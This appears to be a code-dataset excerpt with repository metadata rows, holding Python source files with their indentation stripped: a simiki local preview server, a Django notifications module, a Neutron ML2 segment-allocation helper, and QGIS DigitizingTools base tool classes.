for image, kps in zip(images_aug[bidx], keypoints_aug[bidx]):
if kps is None:
image_kps = image
else:
image_kps = kps.draw_on_image(image, size=5, color=[255, 0, 0])
images_kps_batch.append(image_kps)
images_kps_batches.extend(images_kps_batch)
grid = ia.draw_grid(images_kps_batches, cols=len(images_aug[0]))
return grid
if __name__ == "__main__":
main()
|
mit
| 4,145,880,567,530,394,600
| 33.0625
| 114
| 0.592355
| false
| 3.333333
| false
| false
| false
|
tankywoo/simiki
|
simiki/server.py
|
1
|
4414
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, unicode_literals
import os
import os.path
import sys
import logging
import traceback
from simiki.compat import is_py2, unicode
try:
import SimpleHTTPServer as http_server
except ImportError:
# py3
import http.server as http_server
try:
import SocketServer as socket_server
except ImportError:
# py3
import socketserver as socket_server
try:
import urllib2 as urllib_request
except ImportError:
# py3
import urllib.request as urllib_request
try:
from os import getcwdu
except ImportError:
# py3
from os import getcwd as getcwdu
URL_ROOT = None
PUBLIC_DIRECTORY = None
class Reuse_TCPServer(socket_server.TCPServer):
allow_reuse_address = True
class YARequestHandler(http_server.SimpleHTTPRequestHandler):
def translate_path(self, path):
"""map url path to local file system.
path and return path are str type
in py3, builtin translate_path input is str(but it's unicode) and
return str. so there is no need to do with codecs, system can locate
file with unicode path.
in py2, buildin translate_path input is str and return str. we need
to decode to unicode and then encode path with filesystemencoding(),
as mentioned above, unicode path can be located, but will have problem
with py2's translate_path, for uniformity, we also return the
corresponding type of translate_path in manual part.
TODO:
- fspath with os.sep from url always slash
- URL_ROOT codecs simplify?
- in the end of if body use super translate_path directly?
"""
path = urllib_request.unquote(path)
if not isinstance(path, unicode):
path = path.decode('utf-8')
fsenc = sys.getfilesystemencoding()
if is_py2:
path = path.encode(fsenc)
if URL_ROOT and self.path.startswith(URL_ROOT):
if self.path == URL_ROOT or self.path == URL_ROOT + '/':
fspath = os.path.join(PUBLIC_DIRECTORY, 'index.html')
if is_py2:
fspath = fspath.encode(fsenc)
else:
_url_root = urllib_request.unquote(URL_ROOT)
if not isinstance(_url_root, unicode):
_url_root = _url_root.decode('utf-8')
if is_py2:
_url_root = _url_root.encode(fsenc)
fspath = os.path.join(
PUBLIC_DIRECTORY.encode(fsenc), path[len(_url_root) + 1:]) # noqa: E501
else:
fspath = os.path.join(
PUBLIC_DIRECTORY, path[len(_url_root) + 1:])
return fspath
else:
return http_server.SimpleHTTPRequestHandler \
.translate_path(self, path)
def do_GET(self):
# redirect url
if URL_ROOT and not self.path.startswith(URL_ROOT):
self.send_response(301)
self.send_header('Location', URL_ROOT + self.path)
self.end_headers()
http_server.SimpleHTTPRequestHandler.do_GET(self)
def preview(path, url_root, host='127.0.0.1', port=8000):
"""
:param path: directory path relative to current path
:param url_root: `root` setted in _config.yml
"""
global URL_ROOT, PUBLIC_DIRECTORY
if not host:
host = '127.0.0.1'
if not port:
port = 8000
if url_root.endswith('/'):
url_root = url_root[:-1]
URL_ROOT = urllib_request.quote(url_root.encode('utf-8'))
PUBLIC_DIRECTORY = os.path.join(getcwdu(), path)
if os.path.exists(path):
os.chdir(path)
else:
logging.error("Path {} not exists".format(path))
try:
Handler = YARequestHandler
httpd = Reuse_TCPServer((host, port), Handler)
except (OSError, IOError) as e:
logging.error("Could not listen on port {0}\n{1}"
.format(port, traceback.format_exc()))
sys.exit(getattr(e, 'exitcode', 1))
logging.info("Serving at: http://{0}:{1}{2}/".format(host, port, url_root))
logging.info("Serving running... (Press CTRL-C to quit)")
try:
httpd.serve_forever()
except (KeyboardInterrupt, SystemExit):
logging.info("Shutting down server")
httpd.socket.close()
|
mit
| 1,257,562,507,566,963,700
| 31.218978
| 96
| 0.607612
| false
| 3.899293
| false
| false
| false
|
haystack/eyebrowse-server
|
notifications/models.py
|
1
|
7781
|
from __future__ import unicode_literals
from __future__ import print_function
import base64
import datetime
from django.db import models
from django.db.models.query import QuerySet
from django.core.exceptions import ImproperlyConfigured
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import get_language, activate
from django.utils.encoding import python_2_unicode_compatible
from django.utils.six.moves import cPickle as pickle # pylint: disable-msg=F
from notifications.compat import AUTH_USER_MODEL, GenericForeignKey
from notifications.conf import settings
from notifications.utils import load_media_defaults, notice_setting_for_user, my_import
from notifications.backends.email import EmailBackend
NOTICE_MEDIA, NOTICE_MEDIA_DEFAULTS = load_media_defaults()
class LanguageStoreNotAvailable(Exception):
pass
@python_2_unicode_compatible
class NoticeType(models.Model):
label = models.CharField(_("label"), max_length=40, unique=True)
display = models.CharField(_("display"), max_length=50)
description = models.CharField(_("description"), max_length=100)
# by default only on for media with sensitivity less than or equal to this
# number
default = models.IntegerField(_("default"))
def __str__(self):
return self.label
class Meta:
verbose_name = _("notice type")
verbose_name_plural = _("notice types")
@classmethod
def create(cls, label, display, description, default=2, verbosity=1):
"""
Creates a new NoticeType.
This is intended to be used by other apps as a post_syncdb manangement step.
"""
try:
notice_type = cls._default_manager.get(label=label)
updated = False
if display != notice_type.display:
notice_type.display = display
updated = True
if description != notice_type.description:
notice_type.description = description
updated = True
if default != notice_type.default:
notice_type.default = default
updated = True
if updated:
notice_type.save()
if verbosity > 1:
print("Updated %s NoticeType" % label)
except cls.DoesNotExist:
cls(label=label, display=display,
description=description, default=default).save()
if verbosity > 1:
print("Created %s NoticeType" % label)
class Notification(models.Model):
recipient = models.ForeignKey(User, related_name="notification_recipient")
sender = models.ForeignKey(User, related_name="notification_sender")
date_created = models.DateTimeField(default=datetime.datetime.utcnow())
notice_type = models.ForeignKey(NoticeType)
seen = models.BooleanField(default=False)
url = models.URLField(max_length=300, blank=False, null=True)
message = models.CharField(max_length=2000, blank=False, null=True)
class NoticeSetting(models.Model):
"""
Indicates, for a given user, whether to send notifications
of a given type to a given medium.
"""
user = models.ForeignKey(AUTH_USER_MODEL, verbose_name=_("user"))
notice_type = models.ForeignKey(NoticeType, verbose_name=_("notice type"))
medium = models.CharField(_("medium"), max_length=1, choices=NOTICE_MEDIA)
send = models.BooleanField(_("send"), default=False)
scoping_content_type = models.ForeignKey(
ContentType, null=True, blank=True)
scoping_object_id = models.PositiveIntegerField(null=True, blank=True)
scoping = GenericForeignKey("scoping_content_type", "scoping_object_id")
@classmethod
def for_user(cls, user, notice_type, medium, scoping=None):
"""
Kept for backwards compatibilty but isn't used anywhere within this app
@@@ consider deprecating
"""
return notice_setting_for_user(user, notice_type, medium, scoping)
class Meta:
verbose_name = _("notice setting")
verbose_name_plural = _("notice settings")
unique_together = (
"user", "notice_type", "medium", "scoping_content_type", "scoping_object_id")
class NoticeQueueBatch(models.Model):
"""
A queued notice.
Denormalized data for a notice.
"""
pickled_data = models.TextField()
def get_notification_language(user):
"""
Returns site-specific notification language for this user. Raises
LanguageStoreNotAvailable if this site does not use translated
notifications.
"""
if settings.PINAX_NOTIFICATIONS_LANGUAGE_MODEL:
model = settings.PINAX_NOTIFICATIONS_GET_LANGUAGE_MODEL()
try:
language = model._default_manager.get(user__id__exact=user.id)
if hasattr(language, "language"):
return language.language
except (ImportError, ImproperlyConfigured, model.DoesNotExist):
raise LanguageStoreNotAvailable
raise LanguageStoreNotAvailable
def send_now(users, label, extra=None, sender=None, scoping=None):
"""
Creates a new notice.
This is intended to be how other apps create new notices.
notification.send(user, "friends_invite_sent", {
"spam": "eggs",
"foo": "bar",
)
"""
sent = False
if extra is None:
extra = {}
notice_type = NoticeType.objects.get(label=label)
current_language = get_language()
for user in users:
# get user language for user from language store defined in
# NOTIFICATION_LANGUAGE_MODULE setting
try:
language = get_notification_language(user)
except LanguageStoreNotAvailable:
language = None
if language is not None:
# activate the user's language
activate(language)
# Since we only have 1 medium, just hardcode it in (was getting some weird
# 'module' object is not callable error)
backend = EmailBackend(0)
if backend.can_send(user, notice_type, scoping=scoping):
backend.deliver(user, sender, notice_type, extra)
sent = True
# reset environment to original language
activate(current_language)
return sent
def send(*args, **kwargs):
"""
A basic interface around both queue and send_now. This honors a global
flag NOTIFICATION_QUEUE_ALL that helps determine whether all calls should
be queued or not. A per call ``queue`` or ``now`` keyword argument can be
used to always override the default global behavior.
"""
queue_flag = kwargs.pop("queue", False)
now_flag = kwargs.pop("now", False)
assert not (
queue_flag and now_flag), "'queue' and 'now' cannot both be True."
if queue_flag:
return queue(*args, **kwargs)
elif now_flag:
return send_now(*args, **kwargs)
else:
if settings.PINAX_NOTIFICATIONS_QUEUE_ALL:
return queue(*args, **kwargs)
else:
return send_now(*args, **kwargs)
def queue(users, label, extra=None, sender=None):
"""
Queue the notification in NoticeQueueBatch. This allows for large amounts
of user notifications to be deferred to a seperate process running outside
the webserver.
"""
if extra is None:
extra = {}
if isinstance(users, QuerySet):
users = [row["pk"] for row in users.values("pk")]
else:
users = [user.pk for user in users]
notices = []
for user in users:
notices.append((user, label, extra, sender))
NoticeQueueBatch(
pickled_data=base64.b64encode(pickle.dumps(notices))).save()
|
mit
| 4,718,777,562,124,167,000
| 33.127193
| 89
| 0.658399
| false
| 4.244954
| false
| false
| false
|
eayunstack/neutron
|
neutron/plugins/ml2/drivers/helpers.py
|
1
|
7033
|
# Copyright (c) 2014 Thales Services SAS
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from neutron_lib import context as neutron_ctx
from neutron_lib.plugins.ml2 import api
from neutron_lib.utils import helpers
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import log
from neutron.common import exceptions as exc
from neutron.db import api as db_api
from neutron.objects import base as base_obj
from neutron.plugins.common import utils as p_utils
LOG = log.getLogger(__name__)
IDPOOL_SELECT_SIZE = 100
class BaseTypeDriver(api.ML2TypeDriver):
"""BaseTypeDriver for functions common to Segment and flat."""
def __init__(self):
try:
self.physnet_mtus = helpers.parse_mappings(
cfg.CONF.ml2.physical_network_mtus, unique_values=False
)
except Exception as e:
LOG.error("Failed to parse physical_network_mtus: %s", e)
self.physnet_mtus = []
def get_mtu(self, physical_network=None):
return p_utils.get_deployment_physnet_mtu()
class SegmentTypeDriver(BaseTypeDriver):
"""SegmentTypeDriver for segment allocation.
Provide methods helping to perform segment allocation fully or partially
specified.
"""
def __init__(self, model):
super(SegmentTypeDriver, self).__init__()
if issubclass(model, base_obj.NeutronDbObject):
self.model = model.db_model
else:
self.model = model
self.primary_keys = set(dict(self.model.__table__.columns))
self.primary_keys.remove("allocated")
# TODO(ataraday): get rid of this method when old TypeDriver won't be used
def _get_session(self, arg):
if isinstance(arg, neutron_ctx.Context):
return arg.session, db_api.context_manager.writer.using(arg)
return arg, arg.session.begin(subtransactions=True)
def allocate_fully_specified_segment(self, context, **raw_segment):
"""Allocate segment fully specified by raw_segment.
If segment exists, then try to allocate it and return db object
If segment does not exists, then try to create it and return db object
If allocation/creation failed, then return None
"""
network_type = self.get_type()
session, ctx_manager = self._get_session(context)
try:
with ctx_manager:
alloc = (
session.query(self.model).filter_by(**raw_segment).
first())
if alloc:
if alloc.allocated:
# Segment already allocated
return
else:
# Segment not allocated
LOG.debug("%(type)s segment %(segment)s allocate "
"started ",
{"type": network_type,
"segment": raw_segment})
count = (session.query(self.model).
filter_by(allocated=False, **raw_segment).
update({"allocated": True}))
if count:
LOG.debug("%(type)s segment %(segment)s allocate "
"done ",
{"type": network_type,
"segment": raw_segment})
return alloc
# Segment allocated or deleted since select
LOG.debug("%(type)s segment %(segment)s allocate "
"failed: segment has been allocated or "
"deleted",
{"type": network_type,
"segment": raw_segment})
# Segment to create or already allocated
LOG.debug("%(type)s segment %(segment)s create started",
{"type": network_type, "segment": raw_segment})
alloc = self.model(allocated=True, **raw_segment)
alloc.save(session)
LOG.debug("%(type)s segment %(segment)s create done",
{"type": network_type, "segment": raw_segment})
except db_exc.DBDuplicateEntry:
# Segment already allocated (insert failure)
alloc = None
LOG.debug("%(type)s segment %(segment)s create failed",
{"type": network_type, "segment": raw_segment})
return alloc
def allocate_partially_specified_segment(self, context, **filters):
"""Allocate model segment from pool partially specified by filters.
Return allocated db object or None.
"""
network_type = self.get_type()
session, ctx_manager = self._get_session(context)
with ctx_manager:
select = (session.query(self.model).
filter_by(allocated=False, **filters))
# Selected segment can be allocated before update by someone else,
allocs = select.limit(IDPOOL_SELECT_SIZE).all()
if not allocs:
# No resource available
return
alloc = random.choice(allocs)
raw_segment = dict((k, alloc[k]) for k in self.primary_keys)
LOG.debug("%(type)s segment allocate from pool "
"started with %(segment)s ",
{"type": network_type,
"segment": raw_segment})
count = (session.query(self.model).
filter_by(allocated=False, **raw_segment).
update({"allocated": True}))
if count:
LOG.debug("%(type)s segment allocate from pool "
"success with %(segment)s ",
{"type": network_type,
"segment": raw_segment})
return alloc
# Segment allocated since select
LOG.debug("Allocate %(type)s segment from pool "
"failed with segment %(segment)s",
{"type": network_type,
"segment": raw_segment})
# saving real exception in case we exceeded amount of attempts
raise db_exc.RetryRequest(
exc.NoNetworkFoundInMaximumAllowedAttempts())
|
apache-2.0
| 3,381,965,087,420,021,000
| 39.188571
| 78
| 0.550974
| false
| 4.800683
| false
| false
| false
|
bstroebl/DigitizingTools
|
tools/dttools.py
|
1
|
49803
|
# -*- coding: utf-8 -*-
"""
dttools
`````````````
"""
"""
Part of DigitizingTools, a QGIS plugin that
subsumes different tools neded during digitizing sessions
* begin : 2013-02-25
* copyright : (C) 2013 by Bernhard Ströbl
* email : bernhard.stroebl@jena.de
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from builtins import range
from builtins import object
from qgis.PyQt import QtGui, QtCore, QtWidgets
from qgis.core import *
from qgis.gui import *
import dtutils
class DtTool(object):
'''Abstract class; parent for any Dt tool or button'''
def __init__(self, iface, geometryTypes, **kw):
self.iface = iface
self.canvas = self.iface.mapCanvas()
#custom cursor
self.cursor = QtGui.QCursor(QtGui.QPixmap(["16 16 3 1",
" c None",
". c #FF0000",
"+ c #FFFFFF",
" ",
" +.+ ",
" ++.++ ",
" +.....+ ",
" +. .+ ",
" +. . .+ ",
" +. . .+ ",
" ++. . .++",
" ... ...+... ...",
" ++. . .++",
" +. . .+ ",
" +. . .+ ",
" ++. .+ ",
" ++.....+ ",
" ++.++ ",
" +.+ "]))
self.geometryTypes = []
self.shapeFileGeometryTypes = []
# ESRI shapefile does not distinguish between single and multi geometries
# source of wkbType numbers: http://gdal.org/java/constant-values.html
for aGeomType in geometryTypes:
if aGeomType == 1: # wkbPoint
self.geometryTypes.append(1)
self.shapeFileGeometryTypes.append(4)
self.geometryTypes.append(-2147483647) #wkbPoint25D
self.shapeFileGeometryTypes.append(-2147483647)
elif aGeomType == 2: # wkbLineString
self.geometryTypes.append(2)
self.shapeFileGeometryTypes.append(5)
self.geometryTypes.append(-2147483646) #wkbLineString25D
self.shapeFileGeometryTypes.append(-2147483646)
elif aGeomType == 3: # wkbPolygon
self.geometryTypes.append(3)
self.shapeFileGeometryTypes.append(6)
self.geometryTypes.append(-2147483645) #wkbPolygon25D
self.shapeFileGeometryTypes.append(-2147483645)
elif aGeomType == 4: # wkbMultiPoint
self.geometryTypes.append(4)
self.shapeFileGeometryTypes.append(1) # wkbPoint
self.geometryTypes.append(-2147483644) #wkbMultiPoint25D
self.shapeFileGeometryTypes.append(-2147483647) #wkbPoint25D
elif aGeomType == 5: # wkbMultiLineString
self.geometryTypes.append(5)
self.shapeFileGeometryTypes.append(2) # wkbLineString
self.geometryTypes.append(-2147483643) #wkbMultiLineString25D
self.shapeFileGeometryTypes.append(-2147483646) #wkbLineString25D
elif aGeomType == 6: # wkbMultiPolygon
self.geometryTypes.append(6)
self.shapeFileGeometryTypes.append(6) # wkbPolygon
self.geometryTypes.append(-2147483642) #wkbMultiPolygon25D
self.shapeFileGeometryTypes.append(-2147483645) #wkbPolygon25D
def allowedGeometry(self, layer):
'''check if this layer's geometry type is within the list of allowed types'''
if layer.dataProvider().storageType() == u'ESRI Shapefile': # does not distinguish between single and multi
result = self.shapeFileGeometryTypes.count(layer.wkbType()) >= 1
else:
result = self.geometryTypes.count(layer.wkbType()) == 1
return result
def geometryTypeMatchesLayer(self, layer, geom):
'''check if the passed geom's geometry type matches the layer's type'''
match = layer.wkbType() == geom.wkbType()
if not match:
if layer.dataProvider().storageType() == u'ESRI Shapefile':
# does not distinguish between single and multi
match = (layer.wkbType() == 1 and geom.wkbType() == 4) or \
(layer.wkbType() == 2 and geom.wkbType() == 5) or \
(layer.wkbType() == 3 and geom.wkbType() == 6) or \
(layer.wkbType() == 4 and geom.wkbType() == 1) or \
(layer.wkbType() == 5 and geom.wkbType() == 2) or \
(layer.wkbType() == 6 and geom.wkbType() == 3)
else:
# are we trying a single into a multi layer?
match = (layer.wkbType() == 4 and geom.wkbType() == 1) or \
(layer.wkbType() == 5 and geom.wkbType() == 2) or \
(layer.wkbType() == 6 and geom.wkbType() == 3)
return match
def isPolygonLayer(self, layer):
''' check if this layer is a polygon layer'''
polygonTypes = [3, 6, -2147483645, -2147483642]
result = layer.wkbType() in polygonTypes
return result
def debug(self, str):
title = "DigitizingTools Debugger"
QgsMessageLog.logMessage(title + "\n" + str)
class DtSingleButton(DtTool):
'''Abstract class for a single button
icon [QtGui.QIcon]
tooltip [str]
geometryTypes [array:integer] 0=point, 1=line, 2=polygon'''
def __init__(self, iface, toolBar, icon, tooltip, geometryTypes = [1, 2, 3], dtName = None):
super().__init__(iface, geometryTypes)
self.act = QtWidgets.QAction(icon, tooltip, self.iface.mainWindow())
self.act.triggered.connect(self.process)
if dtName != None:
self.act.setObjectName(dtName)
self.iface.currentLayerChanged.connect(self.enable)
toolBar.addAction(self.act)
self.geometryTypes = geometryTypes
def process(self):
raise NotImplementedError("Should have implemented process")
def enable(self):
'''Enables/disables the corresponding button.'''
# Disable the Button by default
self.act.setEnabled(False)
layer = self.iface.activeLayer()
if layer != None:
#Only for vector layers.
if layer.type() == QgsMapLayer.VectorLayer:
if self.allowedGeometry(layer):
self.act.setEnabled(layer.isEditable())
try:
layer.editingStarted.disconnect(self.enable) # disconnect, will be reconnected
except:
pass
try:
layer.editingStopped.disconnect(self.enable) # when it becomes active layer again
except:
pass
layer.editingStarted.connect(self.enable)
layer.editingStopped.connect(self.enable)
class DtSingleTool(DtSingleButton):
'''Abstract class for a tool'''
def __init__(self, iface, toolBar, icon, tooltip, geometryTypes = [0, 1, 2], crsWarning = True, dtName = None):
super().__init__(iface, toolBar, icon, tooltip, geometryTypes, dtName)
self.tool = None
self.act.setCheckable(True)
self.canvas.mapToolSet.connect(self.toolChanged)
def toolChanged(self, thisTool):
if thisTool != self.tool:
self.deactivate()
def deactivate(self):
if self.tool != None:
self.tool.reset()
self.reset()
self.act.setChecked(False)
def reset(self):
pass
class DtSingleEditTool(DtSingleTool):
'''Abstract class for a tool for interactive editing'''
def __init__(self, iface, toolBar, icon, tooltip, geometryTypes = [0, 1, 2], crsWarning = True, dtName = None):
super().__init__(iface, toolBar, icon, tooltip, geometryTypes, dtName)
self.crsWarning = crsWarning
self.editLayer = None
def reset(self):
self.editLayer = None
def enable(self):
'''Enables/disables the corresponding button.'''
# Disable the Button by default
doEnable = False
layer = self.iface.activeLayer()
if layer != None:
if layer.type() == 0: #Only for vector layers.
if self.allowedGeometry(layer):
doEnable = layer.isEditable()
try:
layer.editingStarted.disconnect(self.enable) # disconnect, will be reconnected
except:
pass
try:
layer.editingStopped.disconnect(self.enable) # when it becomes active layer again
except:
pass
layer.editingStarted.connect(self.enable)
layer.editingStopped.connect(self.enable)
if self.editLayer != None: # we have a current edit session, activeLayer may have changed or editing status of self.editLayer
if self.editLayer != layer:
try:
self.editLayer.editingStarted.disconnect(self.enable) # disconnect, will be reconnected
except:
pass
try:
self.editLayer.editingStopped.disconnect(self.enable) # when it becomes active layer again
except:
pass
self.tool.reset()
self.reset()
if not doEnable:
self.deactivate()
if doEnable and self.crsWarning:
layerCRSSrsid = layer.crs().srsid()
mapSet = self.canvas.mapSettings()
projectCRSSrsid = mapSet.destinationCrs().srsid()
if layerCRSSrsid != projectCRSSrsid:
self.iface.messageBar().pushWarning("DigitizingTools", self.act.toolTip() + " " +
QtWidgets.QApplication.translate("DigitizingTools",
"is disabled because layer CRS and project CRS do not match!"))
doEnable = False
self.act.setEnabled(doEnable)
class DtDualTool(DtTool):
'''Abstract class for a tool with interactive and batch mode
icon [QtGui.QIcon] for interactive mode
tooltip [str] for interactive mode
iconBatch [QtGui.QIcon] for batch mode
tooltipBatch [str] for batch mode
geometryTypes [array:integer] 0=point, 1=line, 2=polygon'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes = [1, 2, 3], dtName = None):
super().__init__(iface, geometryTypes)
self.iface.currentLayerChanged.connect(self.enable)
self.canvas.mapToolSet.connect(self.toolChanged)
#create button
self.button = QtWidgets.QToolButton(toolBar)
self.button.clicked.connect(self.runSlot)
self.button.toggled.connect(self.hasBeenToggled)
#create menu
self.menu = QtWidgets.QMenu(toolBar)
if dtName != None:
self.menu.setObjectName(dtName)
self.menu.triggered.connect(self.menuTriggered)
self.button.setMenu(self.menu)
self.button.setPopupMode(QtWidgets.QToolButton.MenuButtonPopup)
# create actions
self.act = QtWidgets.QAction(icon, tooltip, self.iface.mainWindow())
if dtName != None:
self.act.setObjectName(dtName + "Action")
self.act.setToolTip(tooltip)
self.act_batch = QtWidgets.QAction(iconBatch, tooltipBatch, self.iface.mainWindow())
if dtName != None:
self.act_batch.setObjectName(dtName + "BatchAction")
self.act_batch.setToolTip(tooltipBatch)
self.menu.addAction(self.act)
self.menu.addAction(self.act_batch)
# set the interactive action as default action, user needs to click the button to activate it
self.button.setIcon(self.act.icon())
self.button.setToolTip(self.act.toolTip())
self.button.setCheckable(True)
self.batchMode = False
# add button to toolBar
toolBar.addWidget(self.button)
self.geometryTypes = geometryTypes
# run the enable slot
self.enable()
def menuTriggered(self, thisAction):
if thisAction == self.act:
self.batchMode = False
self.button.setCheckable(True)
if not self.button.isChecked():
self.button.toggle()
else:
self.batchMode = True
if self.button.isCheckable():
if self.button.isChecked():
self.button.toggle()
self.button.setCheckable(False)
self.runSlot(False)
self.button.setIcon(thisAction.icon())
self.button.setToolTip(thisAction.toolTip())
def toolChanged(self, thisTool):
if thisTool != self.tool:
self.deactivate()
def hasBeenToggled(self, isChecked):
raise NotImplementedError("Should have implemented hasBeenToggled")
def deactivate(self):
if self.button != None:
if self.button.isChecked():
self.button.toggle()
def runSlot(self, isChecked):
if self.batchMode:
layer = self.iface.activeLayer()
if layer.selectedFeatureCount() > 0:
self.process()
else:
if not isChecked:
self.button.toggle()
def process(self):
raise NotImplementedError("Should have implemented process")
def enable(self):
# Disable the Button by default
self.button.setEnabled(False)
layer = self.iface.activeLayer()
if layer != None:
#Only for vector layers.
if layer.type() == QgsMapLayer.VectorLayer:
# only for certain layers
if self.allowedGeometry(layer):
if not layer.isEditable():
self.deactivate()
self.button.setEnabled(layer.isEditable())
try:
layer.editingStarted.disconnect(self.enable) # disconnect, will be reconnected
except:
pass
try:
layer.editingStopped.disconnect(self.enable) # when it becomes active layer again
except:
pass
layer.editingStarted.connect(self.enable)
layer.editingStopped.connect(self.enable)
else:
self.deactivate()
class DtDualToolSelectFeature(DtDualTool):
'''Abstract class for a DtDualToo which uses the DtSelectFeatureTool for interactive mode'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes = [1, 2, 3], dtName = None):
super().__init__(iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectFeatureTool(iface)
def featureSelectedSlot(self, fids):
if len(fids) >0:
self.process()
def hasBeenToggled(self, isChecked):
try:
self.tool.featureSelected.disconnect(self.featureSelectedSlot)
# disconnect if it was already connected, so slot gets called only once!
except:
pass
if isChecked:
self.canvas.setMapTool(self.tool)
self.tool.featureSelected.connect(self.featureSelectedSlot)
else:
self.canvas.unsetMapTool(self.tool)
class DtDualToolSelectPolygon(DtDualToolSelectFeature):
'''Abstract class for a DtDualToo which uses the DtSelectFeatureTool for interactive mode'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes = [3, 6], dtName = None):
super().__init__(iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectPolygonTool(iface)
class DtDualToolSelectVertex(DtDualTool):
'''Abstract class for a DtDualTool which uses the DtSelectVertexTool for interactive mode
numVertices [integer] nnumber of vertices to be snapped until vertexFound signal is emitted'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes = [1, 2, 3], numVertices = 1, dtName = None):
super().__init__(iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectVertexTool(self.iface, numVertices)
def hasBeenToggled(self, isChecked):
try:
self.tool.vertexFound.disconnect(self.vertexSnapped)
# disconnect if it was already connected, so slot gets called only once!
except:
pass
if isChecked:
self.canvas.setMapTool(self.tool)
self.tool.vertexFound.connect(self.vertexSnapped)
else:
self.canvas.unsetMapTool(self.tool)
def vertexSnapped(self, snapResult):
raise NotImplementedError("Should have implemented vertexSnapped")
class DtDualToolSelectRing(DtDualTool):
'''
Abstract class for a DtDualTool which uses the DtSelectRingTool for interactive mode
'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch,
tooltipBatch, geometryTypes = [1, 2, 3], dtName = None):
super().__init__(iface, toolBar, icon, tooltip,
iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectRingTool(self.iface)
def hasBeenToggled(self, isChecked):
try:
self.tool.ringSelected.disconnect(self.ringFound)
# disconnect if it was already connected, so slot gets called only once!
except:
pass
if isChecked:
self.canvas.setMapTool(self.tool)
self.tool.ringSelected.connect(self.ringFound)
else:
self.canvas.unsetMapTool(self.tool)
def ringFound(self, selectRingResult):
raise NotImplementedError("Should have implemented ringFound")
class DtDualToolSelectGap(DtDualTool):
'''
Abstract class for a DtDualTool which uses the DtSelectGapTool for interactive mode
'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch,
tooltipBatch, geometryTypes = [1, 2, 3], dtName = None,
allLayers = False):
super().__init__(iface, toolBar, icon, tooltip,
iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectGapTool(self.iface, allLayers)
def hasBeenToggled(self, isChecked):
try:
self.tool.gapSelected.disconnect(self.gapFound)
# disconnect if it was already connected, so slot gets called only once!
except:
pass
if isChecked:
self.canvas.setMapTool(self.tool)
self.tool.gapSelected.connect(self.gapFound)
else:
self.canvas.unsetMapTool(self.tool)
def gapFound(self, selectGapResult):
raise NotImplementedError("Should have implemented gapFound")
class DtMapToolEdit(QgsMapToolEdit, DtTool):
'''abstract subclass of QgsMapToolEdit'''
def __init__(self, iface, **kw):
super().__init__(canvas = iface.mapCanvas(), iface = iface, geometryTypes = [])
def activate(self):
self.canvas.setCursor(self.cursor)
def deactivate(self):
self.reset()
def reset(self, emitSignal = False):
pass
def transformed(self, thisLayer, thisQgsPoint):
layerCRSSrsid = thisLayer.crs().srsid()
projectCRSSrsid = QgsProject.instance().crs().srsid()
if layerCRSSrsid != projectCRSSrsid:
transQgsPoint = QgsGeometry.fromPointXY(thisQgsPoint)
transQgsPoint.transform(QgsCoordinateTransform(
QgsProject.instance().crs(), thisLayer.crs(),
QgsProject.instance()))
return transQgsPoint.asPoint()
else:
return thisQgsPoint
class DtSelectFeatureTool(DtMapToolEdit):
featureSelected = QtCore.pyqtSignal(list)
def __init__(self, iface):
super().__init__(iface)
self.currentHighlight = [None, None] # feature, highlightGraphic
self.ignoreFids = [] # featureids that schould be ignored when looking for a feature
def highlightFeature(self, layer, feature):
'''highlight the feature if it has a geometry'''
geomType = layer.geometryType()
returnGeom = None
if geomType <= 2:
if geomType == 0:
marker = QgsVertexMarker(self.iface.mapCanvas())
marker.setIconType(3) # ICON_BOX
marker.setColor(self.rubberBandColor)
marker.setIconSize(12)
marker.setPenWidth (3)
marker.setCenter(feature.geometry().centroid().asPoint())
returnGeom = marker
else:
settings = QtCore.QSettings()
settings.beginGroup("Qgis/digitizing")
a = settings.value("line_color_alpha",200,type=int)
b = settings.value("line_color_blue",0,type=int)
g = settings.value("line_color_green",0,type=int)
r = settings.value("line_color_red",255,type=int)
lw = settings.value("line_width",1,type=int)
settings.endGroup()
rubberBandColor = QtGui.QColor(r, g, b, a)
rubberBandWidth = lw
rubberBand = QgsRubberBand(self.iface.mapCanvas())
rubberBand.setColor(rubberBandColor)
rubberBand.setWidth(rubberBandWidth)
rubberBand.setToGeometry(feature.geometry(), layer)
returnGeom = rubberBand
self.currentHighlight = [feature, returnGeom]
return returnGeom
else:
return None
def removeHighlight(self):
highlightGeom = self.currentHighlight[1]
if highlightGeom != None:
self.iface.mapCanvas().scene().removeItem(highlightGeom)
self.currentHighlight = [None, None]
def highlightNext(self, layer, startingPoint):
if self.currentHighlight != [None, None]:
self.ignoreFids.append(self.currentHighlight[0].id())
# will return the first feature, if there is only one will return this feature
found = self.getFeatureForPoint(layer, startingPoint)
if len(found) == 0:
self.removeHighlight()
return 0
else:
aFeat = found[0]
numFeatures = found[1]
if self.currentHighlight != [None, None]:
if aFeat.id() != self.currentHighlight[0].id():
self.removeHighlight()
self.highlightFeature(layer, found[0])
else:
self.highlightFeature(layer, found[0])
